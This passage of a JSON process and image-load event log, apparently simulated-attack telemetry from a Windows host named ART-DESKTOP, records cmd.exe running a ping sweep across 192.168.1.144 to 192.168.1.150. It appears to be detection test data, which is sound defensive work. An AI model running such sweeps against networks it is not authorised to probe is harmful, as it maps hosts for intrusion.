"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "process", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572686830000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.144", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4956, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 
131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572686980000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "event_type": "process", - "pid": 4956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572691990000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.145", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3152, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572692130000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572692140000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "event_type": "process", - 
"pid": 3152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572696830000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.146", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3324, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572697029984, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - 
"unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572696980000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "event_type": "process", - "pid": 3324, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572701990000, - "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.147", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4548, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": 
"{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572702140000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "event_type": "process", - "pid": 4548, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572706830000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.148", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5296, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572706990000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572706980000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "event_type": "process", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572711840000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.149", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 688, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 
688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "process", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572716990000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.150", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2388, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": 
"PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": 